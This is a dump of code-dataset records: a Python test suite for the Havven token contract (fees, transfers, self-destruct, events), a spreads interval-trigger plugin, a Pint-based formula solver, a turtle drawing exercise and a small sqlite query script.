self.havven.setIssuanceRatio(MASTER, self.havven.MAX_ISSUANCE_RATIO())\n self.assertReverts(self.havven.setIssuanceRatio, MASTER, self.havven.MAX_ISSUANCE_RATIO() + 1)\n\n # setFeePeriodDuration\n def test_setFeePeriodDuration(self):\n self.havven.setFeePeriodDuration(MASTER, to_seconds(weeks=10))\n self.assertEqual(\n self.havven.feePeriodDuration(),\n to_seconds(weeks=10)\n )\n\n def test_setFeePeriodDuration_max(self):\n sixmonths = 26 * 7 * 24 * 60 * 60\n self.assertReverts(self.havven.setFeePeriodDuration, MASTER, 2 ** 256 - 1)\n 
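# (Comment added: boundary-value check -- exactly six months, the maximum\n # fee period duration, must be accepted below, while MAX + 1 and absurdly\n # large values revert.)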
self.assertReverts(self.havven.setFeePeriodDuration, MASTER, sixmonths + 1)\n self.havven.setFeePeriodDuration(MASTER, sixmonths)\n self.assertEqual(\n self.havven.feePeriodDuration(),\n sixmonths\n )\n\n def test_setFeePeriodDuration_min(self):\n self.havven.setFeePeriodDuration(MASTER, self.havven.MIN_FEE_PERIOD_DURATION())\n self.assertEqual(\n self.havven.feePeriodDuration(),\n self.havven.MIN_FEE_PERIOD_DURATION()\n )\n\n def test_setFeePeriodDuration_invalid_below_min(self):\n self.assertReverts(self.havven.setFeePeriodDuration, MASTER, self.havven.MIN_FEE_PERIOD_DURATION() - 1)\n\n def test_setFeePeriodDuration_invalid_0(self):\n self.assertReverts(self.havven.setFeePeriodDuration, MASTER, self.havven.MIN_FEE_PERIOD_DURATION() - 1)\n\n # endow\n def test_endow_valid(self):\n amount = 50 * UNIT\n havven_balance = self.havven.balanceOf(self.havven_contract.address)\n alice = fresh_account()\n self.assertEqual(self.havven.balanceOf(alice), 0)\n self.havven.endow(MASTER, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), amount)\n self.assertEqual(havven_balance - self.havven.balanceOf(self.havven_contract.address), amount)\n\n def test_endow_0(self):\n amount = 0\n havven_balance = self.havven.balanceOf(self.havven_contract.address)\n alice = fresh_account()\n self.assertEqual(self.havven.balanceOf(alice), 0)\n self.havven.endow(MASTER, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), amount)\n self.assertEqual(havven_balance - self.havven.balanceOf(self.havven_contract.address), amount)\n\n def test_endow_supply(self):\n amount = self.havven.totalSupply()\n havven_balance = self.havven.balanceOf(self.havven_contract.address)\n alice = fresh_account()\n self.assertEqual(self.havven.balanceOf(alice), 0)\n self.havven.endow(MASTER, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), amount)\n self.assertEqual(havven_balance - self.havven.balanceOf(self.havven_contract.address), amount)\n\n def test_endow_more_than_supply(self):\n amount = self.havven.totalSupply() * 2\n alice = fresh_account()\n self.assertReverts(self.havven.endow, MASTER, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), 0)\n\n def test_endow_invalid_sender(self):\n amount = 50 * UNIT\n alice = fresh_account()\n self.assertReverts(self.havven.endow, alice, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), 0)\n\n def test_endow_contract_sender(self):\n amount = 50 * UNIT\n alice = fresh_account()\n self.assertReverts(self.havven.endow, self.havven.contract.address, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), 0)\n\n def test_endow_to_contract(self):\n amount = 50 * UNIT\n self.assertEqual(self.havven.balanceOf(self.havven_contract.address), self.havven.totalSupply())\n self.havven.endow(MASTER, self.havven_contract.address, amount)\n self.assertEqual(self.havven.balanceOf(self.havven_contract.address), self.havven.totalSupply())\n self.havven.endow(MASTER, self.havven_contract.address, amount)\n\n def test_endow_transfers(self):\n alice = fresh_account()\n tx_receipt = self.havven.endow(MASTER, alice, 50 * UNIT)\n event = get_event_data_from_log(self.havven_event_dict, tx_receipt.logs[0])\n self.assertEqual(event['event'], 'Transfer')\n\n # transfer\n def test_transferRollsOver(self):\n alice = fresh_account()\n self.havven.endow(MASTER, alice, 50 * UNIT)\n fast_forward(seconds=self.havven.feePeriodDuration() + 100)\n self.havven.transfer(alice, MASTER, 25 * UNIT)\n tx_receipt = self.havven.rolloverFeePeriodIfElapsed(MASTER)\n\n event 
= get_event_data_from_log(self.havven_event_dict, tx_receipt.logs[0])\n self.assertEqual(event['event'], 'FeePeriodRollover')\n\n # same as test_ExternStateToken\n def test_transfer(self):\n sender, receiver, no_tokens = fresh_accounts(3)\n self.havven.endow(MASTER, sender, 50 * UNIT)\n sender_balance = self.havven.balanceOf(sender)\n\n receiver_balance = self.havven.balanceOf(receiver)\n self.assertEqual(receiver_balance, 0)\n\n value = 10 * UNIT\n total_supply = self.havven.totalSupply()\n\n # This should fail because receiver has no tokens\n self.assertReverts(self.havven.transfer, receiver, sender, value)\n\n self.havven.transfer(sender, receiver, value)\n self.assertEqual(self.havven.balanceOf(receiver), receiver_balance + value)\n self.assertEqual(self.havven.balanceOf(sender), sender_balance - value)\n\n # transfers should leave the supply unchanged\n self.assertEqual(self.havven.totalSupply(), total_supply)\n\n value = 1001 * UNIT\n # This should fail because balance < value and balance > totalSupply\n self.assertReverts(self.havven.transfer, sender, receiver, value)\n\n # 0 value transfers are allowed.\n value = 0\n pre_sender_balance = self.havven.balanceOf(sender)\n pre_receiver_balance = self.havven.balanceOf(receiver)\n self.havven.transfer(sender, receiver, value)\n self.assertEqual(self.havven.balanceOf(receiver), pre_receiver_balance)\n self.assertEqual(self.havven.balanceOf(sender), pre_sender_balance)\n\n # It is also possible to send 0 value transfer from an account with 0 balance.\n self.assertEqual(self.havven.balanceOf(no_tokens), 0)\n self.havven.transfer(no_tokens, receiver, value)\n self.assertEqual(self.havven.balanceOf(no_tokens), 0)\n\n # transferFrom\n def test_transferFromRollsOver(self):\n alice = fresh_account()\n self.havven.endow(MASTER, alice, 50 * UNIT)\n self.havven.approve(alice, MASTER, 25 * UNIT)\n fast_forward(seconds=self.havven.feePeriodDuration() + 100)\n self.havven.transferFrom(MASTER, alice, MASTER, 25 * UNIT)\n tx_receipt = self.havven.rolloverFeePeriodIfElapsed(MASTER)\n\n event = get_event_data_from_log(self.havven_event_dict, tx_receipt.logs[0])\n self.assertEqual(event['event'], 'FeePeriodRollover')\n\n def test_transferFrom(self):\n approver, spender, receiver, no_tokens = fresh_accounts(4)\n\n self.havven.endow(MASTER, approver, 50 * UNIT)\n\n approver_balance = self.havven.balanceOf(approver)\n spender_balance = self.havven.balanceOf(spender)\n receiver_balance = self.havven.balanceOf(receiver)\n\n value = 10 * UNIT\n total_supply = self.havven.totalSupply()\n\n # This fails because there has been no approval yet\n self.assertReverts(self.havven.transferFrom, spender, approver, receiver, value)\n\n self.havven.approve(approver, spender, 2 * value)\n self.assertEqual(self.havven.allowance(approver, spender), 2 * value)\n\n self.assertReverts(self.havven.transferFrom, spender, approver, receiver, 2 * value + 1)\n self.havven.transferFrom(spender, approver, receiver, value)\n\n self.assertEqual(self.havven.balanceOf(approver), approver_balance - value)\n self.assertEqual(self.havven.balanceOf(spender), spender_balance)\n self.assertEqual(self.havven.balanceOf(receiver), receiver_balance + value)\n self.assertEqual(self.havven.allowance(approver, spender), value)\n self.assertEqual(self.havven.totalSupply(), total_supply)\n\n # Empty the account\n self.havven.transferFrom(spender, approver, receiver, value)\n\n # This account has no tokens\n approver_balance = self.havven.balanceOf(no_tokens)\n self.assertEqual(approver_balance, 0)\n 
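# (Comment added: the remaining checks exercise approvals from an empty\n # account -- an allowance can still be granted, but transferFrom must\n # revert because the approver holds no tokens.)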
self.assertEqual(self.havven.allowance(no_tokens, spender), 0)\n\n self.havven.approve(no_tokens, spender, value)\n self.assertEqual(self.havven.allowance(no_tokens, spender), value)\n\n # This should fail because the approver has no tokens.\n self.assertReverts(self.havven.transferFrom, spender, no_tokens, receiver, value)\n\n def test_double_withdraw_fee(self):\n alice = fresh_account()\n self.havven.withdrawFees(alice)\n self.assertReverts(self.havven.withdrawFees, alice)\n\n def test_withdraw_multiple_periods(self):\n alice = fresh_account()\n self.havven.withdrawFees(alice)\n fast_forward(self.havven.feePeriodDuration() * 2)\n self.havven.rolloverFeePeriodIfElapsed(DUMMY)\n self.havven.withdrawFees(alice)\n fast_forward(self.havven.feePeriodDuration() * 2)\n self.havven.rolloverFeePeriodIfElapsed(DUMMY)\n\n # adjustFeeEntitlement - tested above\n # rolloverFee - tested above, indirectly\n\n # withdrawFees - tested in test_FeeCollection.py\n\n def test_selfDestruct(self):\n owner = self.havven.owner()\n notowner = DUMMY\n self.assertNotEqual(owner, notowner)\n\n # The contract cannot be self-destructed before the SD has been initiated.\n self.assertReverts(self.unproxied_havven.selfDestruct, owner)\n\n tx = self.unproxied_havven.initiateSelfDestruct(owner)\n self.assertEventEquals(self.event_map, tx.logs[0],\n \"SelfDestructInitiated\",\n {\"selfDestructDelay\": self.sd_duration},\n location=self.havven_contract.address)\n\n # Neither owners nor non-owners may self-destruct before the time has elapsed.\n self.assertReverts(self.unproxied_havven.selfDestruct, notowner)\n self.assertReverts(self.unproxied_havven.selfDestruct, owner)\n fast_forward(seconds=self.sd_duration, days=-1)\n self.assertReverts(self.unproxied_havven.selfDestruct, notowner)\n self.assertReverts(self.unproxied_havven.selfDestruct, owner)\n fast_forward(seconds=10, days=1)\n\n # Non-owner should not be able to self-destruct even if the time has elapsed.\n self.assertReverts(self.unproxied_havven.selfDestruct, notowner)\n address = self.unproxied_havven.contract.address\n tx = self.unproxied_havven.selfDestruct(owner)\n\n self.assertEventEquals(self.event_map, tx.logs[0],\n \"SelfDestructed\",\n {\"beneficiary\": owner},\n location=self.havven_contract.address)\n # Check that the contract no longer exists\n self.assertEqual(W3.eth.getCode(address), b'\\x00')\n\n ###\n # Modifiers\n ###\n # postrolloverFeePeriodIfElapsed - tested above\n def test_rolloverFeePeriodIfElapsed_escrow_exists(self):\n fast_forward(seconds=self.havven.feePeriodDuration() + 10)\n\n pre_feePeriodStartTime = self.havven.feePeriodStartTime()\n # This should work fine.\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n self.assertGreater(self.havven.feePeriodStartTime(), pre_feePeriodStartTime)\n\n fast_forward(seconds=self.havven.feePeriodDuration() + 10)\n pre_feePeriodStartTime = self.havven.feePeriodStartTime()\n # And so should this\n self.havven.setEscrow(MASTER, ZERO_ADDRESS)\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n self.assertGreater(self.havven.feePeriodStartTime(), pre_feePeriodStartTime)\n\n def test_abuse_havven_balance(self):\n # Test whether repeatedly moving havvens between two parties will shift averages upwards\n alice = fresh_account()\n amount = UNIT * 100000\n self.havven_updatePrice(MASTER, UNIT, block_time() + 1)\n self.havven.setIssuer(MASTER, alice, True)\n self.havven.setIssuanceRatio(MASTER, UNIT)\n a_sum = 0\n self.havven.endow(MASTER, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), amount)\n 
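# (Comment added: the loop below checks the time-weighted issuance sum --\n # each issue/burn round should add exactly (elapsed time) * amount to\n # issuanceCurrentBalanceSum, so shuffling nomins back and forth cannot\n # inflate the average.)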
self.assertEqual(self.havven.issuanceCurrentBalanceSum(alice), 0)\n for i in range(20):\n self.havven.issueNomins(alice, amount)\n t = block_time()\n self.assertEqual(self.nomin.balanceOf(alice), amount)\n self.assertEqual(self.havven.issuanceCurrentBalanceSum(alice), a_sum)\n self.havven.burnNomins(alice, amount)\n a_sum += (block_time() - t) * amount\n self.assertEqual(self.nomin.balanceOf(alice), 0)\n self.assertEqual(self.havven.issuanceCurrentBalanceSum(alice), a_sum)\n\n def test_event_PriceUpdated(self):\n time = block_time()\n tx = self.havven_updatePrice(self.havven.oracle(), 10 * UNIT, time)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"PriceUpdated\",\n {\"newPrice\": 10 * UNIT,\n \"timestamp\": time},\n self.havven_proxy.address)\n\n def test_event_IssuanceRatioUpdated(self):\n new_ratio = UNIT // 12\n tx = self.havven.setIssuanceRatio(MASTER, new_ratio)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"IssuanceRatioUpdated\",\n {\"newRatio\": new_ratio},\n self.havven_proxy.address)\n\n def test_event_FeePeriodRollover(self):\n fee_period = self.havven.feePeriodDuration()\n fast_forward(fee_period + 10) \n tx = self.havven.rolloverFeePeriodIfElapsed(MASTER)\n time = block_time(tx.blockNumber)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"FeePeriodRollover\",\n {\"timestamp\": time},\n self.havven_proxy.address)\n\n def test_event_FeePeriodDurationUpdated(self):\n new_duration = 19 * 24 * 60 * 60\n tx = self.havven.setFeePeriodDuration(MASTER, new_duration)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"FeePeriodDurationUpdated\",\n {\"duration\": new_duration},\n self.havven_proxy.address)\n\n def test_event_FeesWithdrawn(self):\n issuer = fresh_account()\n fee_rate = self.nomin.transferFeeRate()\n fee_period = self.havven.feePeriodDuration()\n self.havven.endow(MASTER, issuer, 2 * UNIT)\n self.havven_updatePrice(self.havven.oracle(), UNIT, block_time())\n self.havven.setIssuanceRatio(MASTER, UNIT)\n self.havven.setIssuer(MASTER, issuer, True)\n self.havven.issueNomins(issuer, 2 * UNIT)\n fast_forward(fee_period + 100)\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n self.nomin.transferSenderPaysFee(issuer, issuer, UNIT)\n fast_forward(fee_period + 100)\n tx = self.havven.withdrawFees(issuer)\n self.assertEventEquals(self.event_map,\n tx.logs[3], \"FeesWithdrawn\",\n {\"account\": issuer,\n \"value\": fee_rate},\n self.havven_proxy.address)\n\n def test_event_OracleUpdated(self):\n new_oracle = fresh_account()\n self.assertNotEqual(MASTER, new_oracle)\n tx = self.havven.setOracle(MASTER, new_oracle)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"OracleUpdated\",\n {\"newOracle\": new_oracle},\n self.havven_proxy.address)\n\n def test_event_NominUpdated(self):\n new_nomin = fresh_account()\n self.assertNotEqual(MASTER, new_nomin)\n tx = self.havven.setNomin(MASTER, new_nomin)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"NominUpdated\",\n {\"newNomin\": new_nomin},\n self.havven_proxy.address)\n\n def test_event_EscrowUpdated(self):\n new_escrow = fresh_account()\n self.assertNotEqual(MASTER, new_escrow)\n tx = self.havven.setEscrow(MASTER, new_escrow)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"EscrowUpdated\",\n {\"newEscrow\": new_escrow},\n self.havven_proxy.address)\n\n def test_event_IssuersUpdated(self):\n new_issuer = fresh_account()\n self.assertNotEqual(MASTER, new_issuer)\n tx = self.havven.setIssuer(MASTER, new_issuer, True)\n self.assertEventEquals(self.event_map,\n tx.logs[0], 
\"IssuersUpdated\",\n {\"account\": new_issuer,\n \"value\": True},\n self.havven_proxy.address)\n tx = self.havven.setIssuer(MASTER, new_issuer, False)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"IssuersUpdated\",\n {\"account\": new_issuer,\n \"value\": False},\n self.havven_proxy.address)\n","sub_path":"ERC20/Havven/tests/test_Havven.py","file_name":"test_Havven.py","file_ext":"py","file_size_in_byte":40716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"178716119","text":"import logging\nimport threading\nimport time\n\nfrom spreads.plugin import HookPlugin, PluginOption, TriggerHooksMixin\n\nlogger = logging.getLogger('spreadsplug.intervaltrigger')\n\n\nclass IntervalTrigger(HookPlugin, TriggerHooksMixin):\n __name__ = 'intervaltrigger'\n\n _loop_thread = None\n _exit_event = None\n\n @classmethod\n def configuration_template(cls):\n return {'interval': PluginOption(5.0, \"Interval between captures\"\n \" (in seconds)\")}\n\n def start_trigger_loop(self, capture_callback):\n logger.debug(\"Starting event loop\")\n self._exit_event = threading.Event()\n self._loop_thread = threading.Thread(target=self._trigger_loop,\n args=(capture_callback, ))\n self._loop_thread.start()\n\n def stop_trigger_loop(self):\n logger.debug(\"Stopping event loop\")\n self._exit_event.set()\n self._loop_thread.join()\n\n def _trigger_loop(self, capture_func):\n interval = self.config['interval'].get(float)\n while True:\n sleep_time = 0\n while sleep_time < interval:\n if self._exit_event.is_set():\n return\n time.sleep(0.01)\n sleep_time += 0.01\n capture_func()\n","sub_path":"spreadsplug/intervaltrigger.py","file_name":"intervaltrigger.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"79116156","text":"# important functions\n# compile_value_unit\n# solve_formula\n\nimport sys\nimport os\nimport re\nimport string\nimport random\nimport itertools\nfrom collections import namedtuple\n\nfrom treelib import Tree\n\nfrom Formulate.value_unit_interpreter import get_value, get_units_string, _remove_spaces\n\nimport Formulate.settings as settings\n\nfrom Formulate.re_search_extensions import re_search_better, re_findall_better, find_all_indexes\nfrom Formulate.re_builders import quotes, pos_lookahead, parentheses, pos_lookbehind, combine_re_expressions\n\n\n# finds the first full component in formulas contained in within opener and closer\n# if there are no openers/closers returns None\n# returns a dictionary that contains\n# leading (before first opener),\n# within (inbetween first opener and corrisponding closer),\n# and trailing (after the corrisponding closer)\n# error checks\n# equal numbers of openers and closers\ndef split_formula(formula, opener='(', closer=')'):\n openers = find_all_indexes(opener, formula)\n closers = find_all_indexes(closer, formula)\n if len(openers) != len(closers):\n raise ValueUnitsError('The number of openers and closers is not equal.')\n if len(openers) == 0:\n return None\n if openers[0] > closers[0]:\n raise ValueUnitsError('Index of first opener before index of first closer.')\n\n # o_index is the index in openers\n # c_index is the index in closers\n if len(openers) == 1:\n # because there is only one possible index for the opener and closer\n c_index = 0\n else:\n # traverses the openers and closers to make sure that there are no conflicts like ())(()\n counter = 1\n o_index = 0\n c_index = 0\n while counter > 
\n\n# creates a string of length length that has no matches with the regular expression pattern re_pattern\n# tries to find a non-matching string max_attempts times. If a non-matching string cannot be found a ValueUnitsError is raised\n# the returned string is used as a placeholder to replace a sub-formula contained in brackets with a variable\n# used in abstract_brackets\ndef no_re_matches(re_pattern, length=5, max_attempts = 100):\n for count in range(max_attempts):\n try_string = ''.join(random.choice(string.ascii_letters) for x in range(length))\n if re_search_better(re_pattern, try_string) is None:\n return try_string\n raise ValueUnitsError('Non-matching pattern cannot be found')\n\n\n# abstracts the sub-formula contained in parentheses to a unique variable name\n# if there are any variables already in formula they need to be selected by the re pattern variables_re so that duplicate variable names are not created\n# returns the formula with all the new variables in it and a dictionary with the new variables as keys and the original expression as the values\ndef abstract_brackets(formula, variables_re=''):\n lwt = split_formula(formula)\n new_variables = {}\n while lwt:\n substitute = no_re_matches(combine_re_expressions(\n itertools.chain((variables_re,), new_variables.keys())\n ))\n formula = lwt['leading'] + substitute + lwt['trailing']\n new_variables[substitute] = lwt['within']\n lwt = split_formula(formula)\n if formula in new_variables.keys():\n # in case of extraneous brackets\n return abstract_brackets(new_variables[formula], variables_re)\n # return [formula, new_variables]\n return namedtuple('abstract_brackets', ('formula', 'new_variables'))(formula, new_variables)\n\n\n# splits formula into 2 parts (leading and trailing) at the operator (from settings.order_of_operations) with the lowest priority\n# if there are no operators in formula returns None\ndef split_operands(formula, variables_re=''):\n formula = _remove_spaces(formula)\n non_inclusive_re = pos_lookahead(combine_re_expressions([variables_re, settings.re_value_unit, settings.re_positive_number]))\n # for op in order_of_operations:\n for op in reversed(settings.formula_operators):\n if 'exponential' in settings.formula_operators[op].keys():\n # special selection settings of the exponent operator\n # this method should be defined in the settings.formula_operators\n # need to label the individual lines in this if statement because I can't remember what specific cases they are for\n # known issue: does not select negative exponents\n variable_and_operator = re_search_better(\n combine_re_expressions((\n parentheses(combine_re_expressions((variables_re, '\\\\)'))) + settings.re_exponent_operator,\n parentheses(settings.re_positive_number) + settings.re_exponent_operator\n )),\n formula\n )\n if variable_and_operator is not None:\n variable = variable_and_operator.replace(op, '')\n if variable == ')':\n variable = '\\)'\n re_pattern = pos_lookbehind(variable) + settings.re_exponent_operator\n 
else:\n continue\n else:\n re_pattern = settings.formula_operators[op]['re_selector'] + non_inclusive_re\n\n selected = re.search(re_pattern, formula)\n if selected:\n # return {'leading': formula[:selected.start()],\n # 'operator': formula[selected.start():selected.end()],\n # 'trailing': formula[selected.end():]}\n return namedtuple('split_operands', ('leading', 'operator', 'trailing'))(\n formula[:selected.start()],\n formula[selected.start():selected.end()],\n formula[selected.end():]\n )\n # ooo = leading_operator_trailing(formula, re_pattern)\n # if ooo:\n # return ooo\n return None\n\n\n# if there are un-needed or extra brackets (defined by opener and closer) at the beginning or end of the formula string they are removed\ndef remove_outside_extranous_parenthesis(formula, opener='(', closer=')'):\n if formula == '':\n return formula\n if formula[0] != opener or formula[-1] != closer:\n return formula\n less_formula = formula[1:-1]\n if split_formula(formula, opener, closer)['within'] == less_formula:\n return remove_outside_extranous_parenthesis(less_formula, opener, closer)\n return formula\n\n\n# helper function for formula_order below\ndef formula_order_helper(formula, variables_re, full_tree, node_id):\n # only_operators_variables_value_units = abstract_brackets(formula, variables_re)\n new_formula, new_variables = abstract_brackets(formula, variables_re)\n all_variables_re = combine_re_expressions([variables_re] + list(new_variables.keys()))\n\n operands_operator = split_operands(new_formula, all_variables_re)\n current_node = full_tree.get_node(node_id)\n\n if operands_operator:\n # leading = operands_operator['leading']\n leading = operands_operator.leading\n # trailing = operands_operator['trailing']\n trailing = operands_operator.trailing\n for nv in list(new_variables.keys()):\n leading = remove_outside_extranous_parenthesis(\n leading.replace(nv, parentheses(new_variables[nv]))\n )\n trailing = remove_outside_extranous_parenthesis(\n trailing.replace(nv, parentheses(new_variables[nv]))\n )\n\n # current_node.data['operator'] = operands_operator['operator']\n current_node.data['operator'] = operands_operator.operator\n full_tree.create_node(tag=leading, parent=node_id, data={'execution_order': 'leading', 'formula': leading})\n full_tree.create_node(tag=trailing, parent=node_id, data={'execution_order': 'trailing', 'formula': trailing})\n formula_order_helper(leading, variables_re, full_tree, current_node.fpointer[0])\n formula_order_helper(trailing, variables_re, full_tree, current_node.fpointer[1])\n\n elif operands_operator is None: current_node.data['formula'] = formula\n else: raise ValueUnitsError('Unknown operands_operator.')\n\n\n# creates a tree data structure that holds the values and variables in respect to their order of operation\n# variable_names can be a string, iterable (includes list and tuple)\ndef formula_order(formula, variable_names=''):\n formula = _remove_spaces(formula)\n if isinstance(variable_names, str):\n variable_names = [variable_names]\n\n formula_tree = Tree()\n formula_tree.create_node(tag=formula, data={})\n formula_order_helper(formula, combine_re_expressions(variable_names), formula_tree, formula_tree.root)\n return formula_tree\n\n# converts the string unit_string to Pint units\ndef compile_unit(unit_string):\n unit_string = get_units_string(unit_string)\n for uus in settings.unaccepted_unit_symbols.keys():\n unit_string = unit_string.replace(uus, settings.unaccepted_unit_symbols[uus])\n\n parted_units = ['settings.ureg' + 
parentheses(quotes(us)) for us in re.split(settings.re_unit_operators, unit_string)]\n parted_operator = re_findall_better(settings.re_unit_operators, unit_string)\n eval_string = parted_units[0]\n for count in range(len(parted_operator)):\n eval_string += parted_operator[count] + parted_units[count + 1]\n return eval(eval_string)\n\n\n# converts the string to a Pint quantity object\n# works with only units and no math\ndef compile_value_unit(value_with_units):\n value = get_value(value_with_units)\n if value is None: value = 1\n return value * compile_unit(value_with_units)\n\n\n# vu = value unit\n# iterates over all leaves solving for each leaf's value\ndef set_iterate_over_leaves(formula_tree, compile_vu_function):\n # fill in leaves\n # for leaf_node in (formula_tree.get_node(leaf_id) for leaf_id in formula_tree.leaves(formula_tree.root)):\n for leaf_node in formula_tree.leaves():\n\n vu = compile_vu_function(leaf_node)\n leaf_node.data['solution'] = vu\n\n # .bpointer gets id of parent node\n if leaf_node.bpointer is not None:\n parent_node = formula_tree.get_node(leaf_node.bpointer)\n # if leaf_node.data['execution_order'] == 'leading':\n # parent_node.data['leading'] = vu\n # elif leaf_node.data['execution_order'] == 'trailing':\n # parent_node.data['trailing'] = vu\n # else:\n # raise ValueUnitsError('Unknown execution_order')\n parent_node.data[leaf_node.data['execution_order']] = vu\n formula_tree.remove_node(leaf_node.identifier)\n\n\n# why aren't there better lambda functions? Love Javascript sometimes.\n# used to solve the internal nodes of formula_tree once the initial leaves have been filled in by leaf_function (defined in solve_formula)\ndef node_compute(leaf_node):\n for key in ('leading', 'trailing'):\n if isinstance(leaf_node.data[key], bool):\n leaf_node.data[key] = int(leaf_node.data[key])\n\n operator_function = settings.formula_operators[leaf_node.data['operator']]['function']\n return operator_function(leaf_node.data['leading'], leaf_node.data['trailing'])\n\n\n# solves the formula defined in the formula string\n# variables is a dictionary with the variables in the formula string as keys and each variable's value (which can have units) as the associated value\n# returns the calculated solution as a Pint quantity\n# includes format checking of the formula and will raise an exception if there is an error\ndef solve_formula(formula, variables=None, return_string=False):\n if variables is None: variables = {} # avoid a shared mutable default argument\n for key, val in variables.items():\n if not isinstance(val, settings.ureg.Quantity):\n variables[key] = compile_value_unit(val)\n\n formula_tree = formula_order(formula, variables)\n if formula_tree.size() == 1:\n single_value = formula_tree.get_node(formula_tree.root).data['formula']\n if single_value in variables.keys():\n single_value = variables[single_value]\n else:\n single_value = compile_value_unit(single_value)\n return single_value\n\n # replacing the class InitTreeLeaf\n # set_iterate_over_leaves(formula_tree, InitTreeLeaf(variables).leaf_function)\n # used to solve the initial leaves of the formula tree\n # why aren't there better lambda functions? 
Love Javascript sometimes.\n def leaf_function(leaf_node):\n potential_variable_name = leaf_node.data['formula']\n if potential_variable_name in variables.keys():\n return variables[potential_variable_name]\n return compile_value_unit(potential_variable_name) # if value unit\n set_iterate_over_leaves(formula_tree, leaf_function)\n\n size = formula_tree.size()\n try_again = True\n while try_again:\n set_iterate_over_leaves(formula_tree, node_compute)\n new_size = formula_tree.size()\n try_again = size != new_size\n size = new_size\n\n solution = formula_tree.get_node(formula_tree.root).data['solution']\n return str(solution) if return_string else solution\n\n\nclass ValueUnitsError(Exception):\n pass\n","sub_path":"Formulate/formula_solver.py","file_name":"formula_solver.py","file_ext":"py","file_size_in_byte":12900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"225620744","text":"import turtle\ns = turtle.Screen()\nt = turtle.Turtle()\n\n# Place your code after this line\nWINDOW_HEIGHT = s.window_height()\nWINDOW_LENGTH = s.window_width()\n\nt.speed(10)\n\ndef draw_xy_plane():\n t.up()\n t.goto(0, WINDOW_HEIGHT / 2)\n t.down()\n t.goto(0, WINDOW_HEIGHT / -2)\n t.up()\n t.goto(0, 0)\n\n t.goto(WINDOW_LENGTH / -2, 0)\n t.down()\n t.goto(WINDOW_LENGTH / 2, 0)\n t.up()\n t.goto(0, 0)\n\n\ndef draw_diagonals():\n t.goto(WINDOW_LENGTH / 2, -WINDOW_HEIGHT / 2)\n t.down()\n t.goto(-WINDOW_LENGTH / 2, WINDOW_HEIGHT / 2)\n t.up()\n t.goto(0, 0)\n\n t.goto(WINDOW_LENGTH / 2, WINDOW_HEIGHT / 2)\n t.down()\n t.goto(-WINDOW_LENGTH / 2, -WINDOW_HEIGHT / 2)\n t.up()\n t.goto(0, 0)\n\n\ndef draw_circles():\n t.right(90)\n t.forward(10)\n t.left(90)\n t.circle(10)\n\n t.right(90)\n t.forward(20)\n t.left(90)\n t.circle(30)\n\n t.right(90)\n t.forward(40)\n t.left(90)\n t.circle(70)\n\n t.right(90)\n t.forward(40)\n t.left(90)\n t.circle(110)\n\n\ndraw_xy_plane()\ndraw_diagonals()\ndraw_circles()\n\ns.exitonclick()\n","sub_path":"Labs/lab1-students/turtle-ex1.py","file_name":"turtle-ex1.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"593509968","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n\nfrom deepdive import *\nimport re\nimport divlaw\nimport handle_string\nimport numpy\ndef add_underline(string):\n return string.replace(\" \",\"_\")\ndef compare(a,b):\n if len(a) > len(b):\n return -1\n elif len(a) < len(b):\n return 1\n else :\n return 0\n@tsv_extractor\n@returns(lambda\n id =\"text\",\n cont = \"text\",\n :[])\n\ndef extract(\n doc_id =\"text\",\n content=\"text\",\n phrases = \"text[]\",\n ):\n\n content = content.replace('*',' ')\n content = content.replace('_',' ')\n if phrases is None or len(phrases) == 0: \n yield [\n doc_id,\n content\n ]\n else :\n a = sorted(phrases,cmp = compare)\n for i in a:\n content = content.replace(i,add_underline(i)) \n yield [\n doc_id,\n content\n ]","sub_path":"deepdive/udf/extract_content.py","file_name":"extract_content.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"622347236","text":"import sqlite3\n\n\nresult = []\nconn = sqlite3.connect(\"arquivo.db\")\ntry:\n sql = \"SELECT id, latitude, longitude, dtRegister, numSats, altitude, horizontalDil \\\n FROM latlng \\\n ORDER BY datetime(dtRegister) DESC LIMIT 1\"\n row = conn.cursor().execute(sql).fetchone()\n if row:\n print(row)\n\nfinally:\n 
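# make sure the connection is always released, even if the query above raises\n 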
